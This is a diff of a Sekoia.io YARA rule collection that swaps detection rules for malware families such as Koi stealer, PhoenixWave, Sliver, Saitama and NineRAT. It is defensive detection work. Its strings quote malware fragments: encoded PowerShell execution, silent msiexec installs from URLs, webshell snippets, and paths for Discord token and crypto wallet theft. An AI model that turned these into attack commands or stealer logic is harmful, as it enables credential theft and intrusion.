-		hash1 = "3b05e89ff2338472cc493d59bae450338effd29f0ed7d46fb999709e63cf2472"
 
 	strings:
-		$s1 = "&#109;&#104;&#116;&#109;&#108;&#58;&#104;&#116;&#116;&#112;"
-		$s2 = "&#38;&#95;&#116;&#115;&#61;"
-		$header = "<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>"
+		$ = "{status} Using the list of users that the {lgcyan}script"
+		$ = "--host 192.168.1.12 -p 624 -uW /opt/SecLists/Usernames/"
 
 	condition:
-		filesize < 500KB and any of ( $s* ) and $header at 0
+		all of them and filesize < 10KB
 }
-rule SEKOIA_Generic_Sharpshooter_Payload_6 : FILE
+rule SEKOIA_Koi_Netstealer : FILE
 {
 	meta:
-		description = "Detects payload created by SharpShooter"
+		description = "Detects NET ofbuscated Stealer used loaded by KoiLoader"
 		author = "Sekoia.io"
-		id = "53506a3e-b0d8-4a1e-88d9-485e829f25cb"
-		date = "2023-02-03"
+		id = "deb06e2a-848c-44b3-be95-017ebccf11f8"
+		date = "2024-03-20"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/generic_sharpshooter_payload_6.yar#L1-L18"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "38919408d2d0a9f51822302f4f821bf5776f119bf0d1b54b71b1040c7ad59da5"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/koi_netstealer.yar#L1-L20"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "814db1092820ff1ed9e592dc92c72ad73643eb6d68df9f593ed637434373e41b"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -248076,26 +248614,27 @@ rule SEKOIA_Generic_Sharpshooter_Payload_6 : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "function ${rc4Function}(r,o){for("
-		$ = "function ${b64AndRC4Function}(r,o){var"
-		$ = "Real-Time Scanning: No threats detected"
-		$ = "Please wait while your file is being downloaded..."
+		$name_1 = "pg20"
+		$name_2 = "pg40"
+		$s1 = "Curve25519"
+		$s2 = "ConsoleApp"
+		$s3 = "e0d2eec7-eb14-48ba-8709-dcc9de65947d"
 
 	condition:
-		3 of them and filesize < 2MB
+		uint16be( 0 ) == 0x4d5a and filesize < 150KB and any of ( $name_* ) and all of ( $s* )
 }
-rule SEKOIA_Malware_Valleyrat_Downloader_Strings : FILE
+rule SEKOIA_Infostealer_Win_Phoenixwave : FILE
 {
 	meta:
-		description = "Detects ValleyRat downloader"
+		description = "Detect the PhoenixWave infostealer based on specific strings"
 		author = "Sekoia.io"
-		id = "12985f34-f894-402b-80d1-5d6b2486d730"
-		date = "2024-06-11"
+		id = "67c05ea8-2f1b-4c60-b108-e05d7d0c6508"
+		date = "2022-04-07"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/malware_valleyrat_downloader_strings.yar#L1-L20"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "321683ac5bdec626cf140cb50507fb03aea2a32635eb6cec884a3fa43c1a9d91"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/infostealer_win_phoenixwave.yar#L1-L35"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "efeffb2f0df4c2f8156c401bac5f44c415c4c3e02e84e8db55dad68488f39fea"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -248103,55 +248642,68 @@ rule SEKOIA_Malware_Valleyrat_Downloader_Strings : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = { 43 00 3a 00 5c [0-30]
-        5c 00 4e 00 54 00 55
-        00 53 00 45 00 52 00
-        2e 00 44 00 58 }
+		$str0 = "##################################################\n                  Information\n##################################################\n" wide
+		$str1 = "Specify a single character: either D or F" wide
+		$str2 = "// This SFX source file was generated by DotNetZip " wide
+		$str3 = "aHR0cDovL2lwLWFwaS5jb20vanNvbg==" wide
+		$str4 = "TG9jYWxBcHBEYXRh" wide
+		$str5 = "UGhvZW5peFdhdmU=" wide
+		$str6 = "virustotal" wide
+		$str7 = "SELECT * FROM win32_operatingsystem" wide
+		$str8 = "SELECT * FROM Win32_VideoController" wide
+		$app0 = "\\discordcanary\\Local Storage\\leveldb" wide
+		$app1 = "\\discordptb\\Local Storage\\leveldb" wide
+		$app2 = "\\discorddevelopment\\Local Storage\\leveldb" wide
+		$app3 = "\\D877F783D5D3EF8C\\" wide
+		$app4 = "\\IndexedDB\\file__0.indexeddb.leveldb" wide
+		$app5 = "\\Steam\\Games.txt" wide
+		$app6 = "nkbihfbeogaeaoehlefnkodbefgpgknn" wide
+		$app7 = "fhbohimaelbohpjbbldcngcnapndodjp" wide
+		$app8 = "fnjhmkhhmkbjkkabndcnnogagogbneec" wide
+		$app9 = "\\Opera Software\\Opera GX Stable" wide
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and filesize < 2MB and all of them
+		uint16( 0 ) == 0x5A4D and 7 of ( $str* ) and 8 of ( $app* )
 }
-
-rule SEKOIA_Apt_Win_Disabledefender
+rule SEKOIA_Apt_Andariel_Siennablue : FILE
 {
 	meta:
-		description = "detects strings and imphash"
+		description = "Detects SiennaBlue based routine names"
 		author = "Sekoia.io"
-		id = "a7b124ab-4c9d-47c0-a59e-211cc713b9b3"
-		date = "2022-09-23"
+		id = "ab3f8b49-0851-47a8-ac77-98d4e26f448e"
+		date = "2023-11-16"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/apt_win_disabledefender.yar#L3-L20"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "3b8c8d9144d9f97ee053c7cefc30d3920940bc33efcd1d7f5c61666217ef7896"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/apt_andariel_siennablue.yar#L1-L20"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "0876deb2e76098ac8d304737243d3a76e9741b2ca1570034bec51fea5a40818d"
 		score = 75
 		quality = 80
-		tags = ""
+		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "Restarting with privileges"
-		$ = "Windows defender is currently ACTIVE"
-		$ = "Windows defender is currently OFF"
-		$ = "Disabled windows defender"
-		$ = "Failed to disable defender..."
+		$ = "main_cryptAVPass"
+		$ = "main_DecryptString"
+		$ = "main_DisableNetworkDevice"
+		$ = "main_DeleteSchTask"
 
 	condition:
-		4 of them or pe.imphash ( ) == "74a6ef9e7b49c71341e439022f643c8e"
+		( uint32be( 0 ) == 0x7f454c46 or uint16be( 0 ) == 0x4d5a ) and filesize > 4MB and filesize < 15MB and all of them
 }
-rule SEKOIA_Guerrilla_Lemongroup : FILE
+rule SEKOIA_Malware_Httpshell_Strings : FILE
 {
 	meta:
-		description = "No description has been set in the source file - SEKOIA"
+		description = "Detects HTTPShell based on URL patterns"
 		author = "Sekoia.io"
-		id = "df635b5a-a19a-48ab-9a3a-9723e265c71d"
-		date = "2023-05-23"
+		id = "58f25666-5dc2-4f4f-9fac-fc05d1e66945"
+		date = "2024-01-08"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/guerrilla_lemongroup.yar#L1-L28"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "b644cb537a42217f2549f37bfe07ae0b7ba39fc248ab3d5fd870384c7684683b"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/malware_httpshell_strings.yar#L1-L20"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "8f6f6ad459cc6edd80432528a507ca2cb84e6859be94f2e1caaea801bf809375"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -248159,144 +248711,132 @@ rule SEKOIA_Guerrilla_Lemongroup : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$dex = { 64 65 78 0A 30 33 ?? 00 }
-		$odex = { 64 65 79 0A 30 33 ?? 00 }
-		$s2 = "data response code===" ascii
-		$s3 = "httpCon:" ascii
-		$s4 = "processName :" ascii
-		$s5 = "startListTasks......" ascii
-		$s6 = "url==" ascii
-		$s7 = "java core run ZYGOTE_PROCESS" ascii
-		$api1 = "/api.php" ascii
-		$api2 = "/event.php" ascii
-		$api3 = "/apiRS.php" ascii
+		$ = "/api/v1/Client/Info" wide ascii
+		$ = "/api/v1/Client/Download" wide ascii
+		$ = "/api/v1/Client/Upload" wide ascii
+		$ = "/api/v1/Client/Info" base64 base64wide
+		$ = "/api/v1/Client/Download" base64 base64wide
+		$ = "/api/v1/Client/Upload" base64 base64wide
 
 	condition:
-		($dex at 0 or $odex at 0 ) and filesize > 100KB and filesize < 5MB and 5 of ( $s* ) and 1 of ( $api* )
+		3 of them and filesize < 5MB
 }
-rule SEKOIA_Apt_Aptc60_Downloader_Strings : FILE
+rule SEKOIA_Apt_Apt41_Powershell_Exfiltration_Script : FILE
 {
 	meta:
-		description = "Detects a simple downloader abusing wlrmdr.exe and used by APT-C-60"
+		description = "Detects PowerShell exfiltration script"
 		author = "Sekoia.io"
-		id = "02fd6d5b-7211-46cc-bcff-ab5d78e459c0"
-		date = "2024-09-05"
+		id = "9a15f845-c0af-4f1c-a033-b4f40232dc0d"
+		date = "2023-11-15"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/apt_aptc60_downloader_strings.yar#L1-L20"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		hash = "b14ef85a60ac71c669cc960bdf580144"
-		logic_hash = "f05480834e6d91a852a190a2ecec05aaea1affa8a605a56c80962a9fbfc8f0c0"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/apt_apt41_powershell_exfiltration_script.yar#L1-L18"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "0ba4118855d6bd54cbb3a35e3b5fc36484eeb1e742ed3480e6c967b078ec4881"
 		score = 75
-		quality = 80
+		quality = 72
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "mydllmain" fullword
-		$ = "-s 3600 -f 0 -t _ -m _ -a 11 -u" wide
-		$ = "WlrMakeService" wide
-		$ = "Trigger1" wide
+		$ = "$UPLOAD_PASSPORT" ascii wide nocase
+		$ = "$fileName=$singleFile.Name" ascii wide nocase
+		$ = "Upload-Passport" ascii wide nocase
+		$ = "$singleFile in $files" ascii wide nocase
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and all of them and filesize < 500KB
+		filesize < 10KB and all of them
 }
-rule SEKOIA_Webshell_Wso_Webshell_Strings
+
+rule SEKOIA_Backdoor_Win_Mgbot_Main
 {
 	meta:
-		description = "Detects the WSO webshells"
+		description = "Detect MgBot main.dll file"
 		author = "Sekoia.io"
-		id = "84340792-73a4-4d61-9957-6cfa1f6444a7"
-		date = "2022-04-22"
+		id = "528baa11-58d5-470a-bd6d-963d4ac75d97"
+		date = "2024-03-20"
 		modified = "2024-12-19"
-		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/webshell_wso_webshell_strings.yar#L1-L20"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "4d6966a34dc8e7390913857144da106affea14668d1c2c11a05be62a6e625c8f"
+		reference = "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/apt-attacks-telecoms-africa-mgbot"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/backdoor_win_mgbot_main.yar#L4-L35"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "61b335c88ce8bc56396b597c7c6f27b1d431941682401f0b3950c80edf7d8403"
 		score = 75
 		quality = 80
 		tags = ""
 		version = "1.0"
 		classification = "TLP:CLEAR"
-
-	strings:
-		$ = "decrypt($str,$pwd){$pwd=base64_encode($pwd);"
-		$ = "prototype(md5($_SERVER['HTTP_HOST'])"
-		$ = "$_COOKIE[md5($_SERVER['HTTP_HOST'])."
-		$ = "set(a,c,p1,p2,p3,charset)"
-		$ = "(($p & 0x0008) ? (($p & 0x0400)"
-		$ = "gcc','lcc','cc','ld','make','php"
+		hash1 = "706c9030c2fa5eb758fa2113df3a7e79257808b3e79e46869d1bf279ed488c36"
+		hash2 = "017187a1b6d58c69d90d81055db031f1a7569a3b95743679b21e44ea82cfb6c7"
 
 	condition:
-		3 of them
+		pe.imphash( ) == "8e1ee04a99c77bd54c6dc55214ffa2e3" or hash.md5 ( pe.rich_signature.clear_data ) == "67e8e8b75b981b5c8ff31149dc2c61b2" or for any i in ( 0 .. pe.number_of_sections -1 ) : ( hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "7c6adf9987e6dfbf19b5f156b0314798" or hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "46fa9f5a035c8ae8de1a0d14150bd5ef" or hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "f7895f9456f8d51125e6744960c38133" or hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "5d82bb8a7ef37c417615381b446f715c" ) or for any i in ( 0 .. pe.number_of_resources -1 ) : ( hash.sha256 ( pe.resources [ i ] . offset , pe.resources [ i ] . length ) == "d7808c6662f098e685040f7c61bc033d9e73002f674de7cf2ffcd6230d60d429" )
 }
-rule SEKOIA_Exploit_Linux_Eop_Ubuntu_Overlayfs_Local_Privesc_Strings : FILE
+
+rule SEKOIA_Implant_Win_Sliver_Dll : FILE
 {
 	meta:
-		description = "Detects Ubuntu OverlayFS Local Privesc exploit"
+		description = "Detect the Sliver DLL based on export names (standalone and process/memory dumps)"
 		author = "Sekoia.io"
-		id = "5e0e73f5-4cb3-4a79-adac-578b17ed7660"
-		date = "2023-12-08"
+		id = "41d83011-a08b-4245-b633-79fe6afaa4d2"
+		date = "2021-11-08"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/exploit_linux_eop_ubuntu_overlayfs_local_privesc_strings.yar#L1-L20"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "48ff9d2a10eef1e9b9088ba4a53aa77f43324e5d51da65b65a5829276067f011"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/implant_win_sliver_dll.yar#L3-L32"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "251a123fe70338d18c9bc9fb9e0b0d542f2b94203bee8537244e62fa102f371b"
 		score = 75
 		quality = 80
 		tags = "FILE"
-		version = "1.0"
+		modification_date = "2021-12-22"
+		version = "1.1"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "./ovlcap"
-		$ = "rm -rf '%s/'"
-		$ = "./ovlcap/work"
-		$ = "./ovlcap/lower"
-		$ = "./ovlcap/upper"
-		$ = "./ovlcap/merge"
+		$a1 = "main.RunSliver"
+		$a2 = "main.DllInstall"
 
 	condition:
-		uint32be( 0 ) == 0x7f454c46 and filesize < 1MB and all of them
+		( filesize > 8MB and filesize < 11MB and uint16be( 0 ) == 0x4d5a and pe.characteristics & pe.DLL and pe.exports ( "RunSliver" ) and pe.exports ( "DllInstall" ) and pe.exports ( "VoidFunc" ) ) or ( true and ( uint32be( 0 ) == 0x4d444d50 or uint32be( 0 ) == 0x00000000 ) and $a2 in ( @a1 .. @a1 + 100 ) )
 }
-rule SEKOIA_Loader_Win_Piccassoloader : CVE_2023_38831
+rule SEKOIA_Apt_Mustangpanda_Coolclient : FILE
 {
 	meta:
-		description = "Detect the variant of Picasso used by GhostWriter as CVE-2023-38831 exploitation payload"
+		description = "Detect COOLCLIENT via obfuscation & specific string"
 		author = "Sekoia.io"
-		id = "91d9c2de-451e-467e-8f5c-38bbcce92b72"
-		date = "2023-09-07"
+		id = "2f8fdb66-03a2-400f-808b-56ae1b276d2f"
+		date = "2023-03-27"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/loader_win_piccassoloader.yar#L1-L16"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "93e598f6c70dcb1ddf20ea926af72241e135bdf910f3721a7a0c3036f6a3d1b9"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/apt_mustangpanda_coolclient.yar#L1-L19"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "9fd552604299ecb8fa28042ee26e72bbe4fb9804ad087bf4a373b2c2e17d43b0"
 		score = 75
-		quality = 76
-		tags = "CVE-2023-38831"
+		quality = 80
+		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = {2c 27 44 65 63 72 79 70 74 6f 72 27 2c 27 6e 6f 64 65 27 2c 27 55 73 65 72 2d}
-		$ = {5c 78 32 30 43 68 72 6f 6d 65 2f 31 30 27 2c 27 67 67 65 72 27 2c 27 73 65 64 43 69 70 68 65 72 27 2c 27 5f 61 70 70 65 6e 64 27 2c 27 5f 45 4e 43 5f 58 46 4f 52 4d 27 2c 27 57 53 63 72 69 70 74 2e 53 68 27}
+		$s1 = {eb 14 ea 50 eb 0b ea 8b c4 a8 01 74 06 eb 0b}
+		$s2 = {66 0f d6 44 24 eb eb}
+		$s3 = "c:\\windows\\syste" fullword
 
 	condition:
-		1 of them
+		( uint32be( 0 ) == 0x7f454c46 or uint16be( 0 ) == 0x4d5a ) and filesize < 1MB and all of them
 }
-rule SEKOIA_Apt_Badmagic_Malicious_Lnk : FILE
+rule SEKOIA_Apt_Oilrig_Saitama_Backdoor_May2022 : FILE
 {
 	meta:
-		description = "Detect LNK used by BadMagic to execute MSI payloads."
+		description = "Detects tje Saitama backdoor"
 		author = "Sekoia.io"
-		id = "731bd51d-c4e4-4efb-9fa8-f981a8555ed3"
-		date = "2023-05-15"
+		id = "4ea8c27f-c441-4616-a29b-2b5dfdd3bd20"
+		date = "2022-05-13"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/apt_badmagic_malicious_lnk.yar#L1-L19"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "b83749c71cefb485f8bbea1d465fc477de159e086efa04ebce4d0778a203ed89"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/apt_oilrig_saitama_backdoor_may2022.yar#L1-L20"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "b3876995fde9c26052c39859684cec05e8c1bc8e2a62946b49ed328e84499dc6"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -248304,66 +248844,59 @@ rule SEKOIA_Apt_Badmagic_Malicious_Lnk : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "/i http" wide
-		$ = ".msi /quiet" wide
-		$ = "%WINDIR%\\System32\\msiexec.exe"
+		$ = { 7E [4] 7E [4] 59 0A 02 8E 69 06 28 [4] D1 0B 02 16 7E [4] 7E [4] 07 }
+		$ = "systeminfo | findstr" wide
+		$ = "powershell -exec bypass -enc" wide
+		$ = "SendAndReceive : {0}" wide
+		$ = "SleepSecond : Start" wide
 
 	condition:
-		uint32be( 0 ) == 0x4c000000 and filesize < 1KB and all of them
+		uint16be( 0 ) == 0x4d5a and 2 of them
 }
-rule SEKOIA_Implant_Lin_Geacon : FILE
+
+rule SEKOIA_Rat_Win_Ninerat
 {
 	meta:
-		description = "Finds Geacon samples based on specific strings"
+		description = "Detect the NineRAT payload"
 		author = "Sekoia.io"
-		id = "ad71522e-270b-47d0-9c01-081f05a2b72a"
-		date = "2024-01-11"
+		id = "a9f4f78b-5b86-4ac1-9b9b-ba2672b938bf"
+		date = "2023-12-12"
 		modified = "2024-12-19"
-		reference = "https://www.sentinelone.com/blog/geacon-brings-cobalt-strike-capabilities-to-macos-threat-actors/"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/implant_lin_geacon.yar#L1-L35"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "c6fa5815bf618eb588d511f18231042944dee20c1b13096c44910d43ca552bfa"
+		reference = "https://github.com/SEKOIA-IO/Community"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/rat_win_ninerat.yar#L4-L31"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "bbb695444a6ec0d6049d0ce233ca37de6f78393e5ceb5d454867c8b554269684"
 		score = 75
 		quality = 80
-		tags = "FILE"
+		tags = ""
 		version = "1.0"
 		classification = "TLP:CLEAR"
+		hash1 = "47e017b40d418374c0889e4d22aa48633b1d41b16b61b1f2897a39112a435d30"
+		hash2 = "82d4a0fef550af4f01a07041c16d851f262d859a3352475c62630e2c16a21def"
 
 	strings:
-		$gea01 = "geacon/config.init" ascii
-		$gea02 = "geacon_pro-master/config/config.go" ascii
-		$gea03 = "geacon_plus-main/config/config.go" ascii
-		$gea04 = "command type %d is not support by geacon now" ascii
-		$gea05 = "main/sysinfo.GeaconID" ascii
-		$str01 = "command.StealToken" ascii
-		$str02 = "command.MakeToken" ascii
-		$str03 = "command/misc.go" ascii
-		$str04 = "config/c2profile.go" ascii
-		$str05 = "crypt.AesCBCDecrypt" ascii
-		$str06 = "packet.File_Browse" ascii
-		$str07 = "packet.FirstBlood" ascii
-		$str08 = "packet.ParseCommandShell" ascii
-		$str09 = "packet.ParseCommandUpload" ascii
-		$str10 = "packet.PushResult" ascii
-		$str11 = "sysinfo.GetComputerName" ascii
-		$str12 = "sysinfo.IsOSX64" ascii
-		$str13 = "util..inittask" ascii
+		$ = "https://api.telegram.org/bot"
+		$ = "/getMe"
+		$ = "/upgrade"
+		$ = "/getFile"
+		$ = "/sendMessage"
+		$ = ">> Request send time:"
 
 	condition:
-		uint32( 0 ) == 0x464C457F and ( ( 1 of ( $gea* ) and 2 of ( $str* ) ) or 8 of ( $str* ) )
+		all of them or for any i in ( 0 .. pe.number_of_sections -1 ) : ( hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "3ce78c89e2c0e795ad3382aa12e99683" )
 }
-rule SEKOIA_Ursnif_Ldr4
+rule SEKOIA_Backdoor_Oyster
 {
 	meta:
-		description = "Ursnif LDR4"
+		description = "Detects files related to the Oyster backdoor."
 		author = "Sekoia.io"
-		id = "73e63481-8a89-4342-87f0-8dc7ad459396"
-		date = "2024-12-19"
+		id = "f95f98ea-1e52-45ae-8abf-a986f95d4ab2"
+		date = "2024-08-29"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/ursnif_ldr4.yar#L1-L26"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "6fe237c6370a1b99bddb7bee4170d29cbb780dc445f5d5039201ddbaf05c63db"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/backdoor_oyster.yar#L1-L16"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "ffd84d0c7064bcd69121aa606bc642ff2b5c9927ba622260a02a9689c7ab8878"
 		score = 75
 		quality = 80
 		tags = ""
@@ -248371,34 +248904,28 @@ rule SEKOIA_Ursnif_Ldr4
 		classification = "TLP:CLEAR"
 
 	strings:
-		$str1 = "LOADER.dll" fullword
-		$str2 = "DllRegisterServer" fullword
-		$str3 = ".bss" fullword
-		$x64_code1 = { 3D 2E 62 73 73 74 0A 48 83 C7 28 }
-		$x64_code2 = { 8B 17 48 83 C7 04 8B CA 8b C2 23 CB 0B C3 F7 D1 23 C8 41 2B CA 44 8B D2 41 89 08 41 8B CB 49 83 C0 04 83 E1 07 FF C1 41 D3 C2 41 83 EB 04 79 }
-		$x64_code3 = { 41 0F B6 01 49 FF C1 8B C8 8B D0 83 E1 03 C1 E1 03 D3 E2 44 03 C2 41 83 C2 FF 75 }
-		$x64_code4 = { 45 8D 45 08 48 8D 8C 24 [4] BA 30 00 FE 7F E8 }
-		$x64_code5 = { 48 8D 8C 24 [4] BA 30 00 FE 7F 41 B8 08 00 00 00 E8 }
-		$x86_code1 = { 81 F9 2E 62 73 73 74 09 83 C6 28 }
-		$x86_code2 = { 8B 06 8B D0 23 55 0C 8B D8 0B 5D 0C F7 D2 23 D3 2B D1 8A 4D 08 80 E1 07 83 C6 04 89 17 83 C7 04 FE C1 D3 C0 83 6D 08 04 8B C8 79 }
-		$x86_code3 = { 8A 0E 0F B6 D1 8B CA 83 E1 03 C1 E1 03 D3 E2 46 03 C2 4F 75 }
-		$x86_code4 = { 6A 08 8D 45 F8 68 30 00 FE 7F 50 E8 }
+		$s1 = "CleanUp30.dll" ascii fullword
+		$s2 = "MSTeamsSetup_c_l_.exe" ascii fullword
 
 	condition:
-		true and 5 of them
+		all of them
 }
-rule SEKOIA_Loader_Win_Fudloader : FILE
+rule SEKOIA_Killfloor_Avkiller_Strings : FILE
 {
 	meta:
-		description = "Finds FUD-Loader samples based on specific strings"
+		description = "Kill-Floor strings"
 		author = "Sekoia.io"
-		id = "4c2ac614-89af-4449-9fd2-9f935e4c27b8"
-		date = "2023-09-25"
+		id = "ae6908c3-27d4-4d2c-af21-a9548dfcd487"
+		date = "2024-10-29"
 		modified = "2024-12-19"
-		reference = "https://github.com/0day2/FUD-Loader/"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/loader_win_fudloader.yar#L1-L24"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "bf19169963cfcbcf41a2dc5f9447738e957878972590b2a8d310eed1c54f3676"
+		reference = "https://github.com/SEKOIA-IO/Community"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/killfloor_avkiller_strings.yar#L1-L25"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		hash = "9f16176ac20f7855fa960d321e156d69"
+		hash = "4b019e9ed2de734e242602abce06f7c1"
+		hash = "81ae32d9de8fd21acfc61d62f3292277"
+		hash = "7cb2c4560e02c25463ec70e222ad0018"
+		logic_hash = "e89d0936612104f98b7f56dca09702f31f07868f239c2d11dd738e015e757b3a"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -248406,110 +248933,117 @@ rule SEKOIA_Loader_Win_Fudloader : FILE
